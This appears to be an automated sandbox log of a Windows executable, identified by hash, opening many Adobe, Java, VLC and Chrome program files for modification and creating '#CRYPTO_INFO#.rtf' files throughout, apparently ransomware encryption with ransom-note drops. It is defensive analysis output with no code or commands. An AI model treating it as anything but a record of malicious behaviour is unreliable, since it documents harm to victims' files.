8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_delete_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnprotectUnlock.TTS 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnprotectSuspend.docm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansDemiBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\youtube.crx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_cs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util-lookup.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\NOTICE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496937509.profile.gz 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_forward_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_backarrow_default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_selectlist_checkmark_18.svg 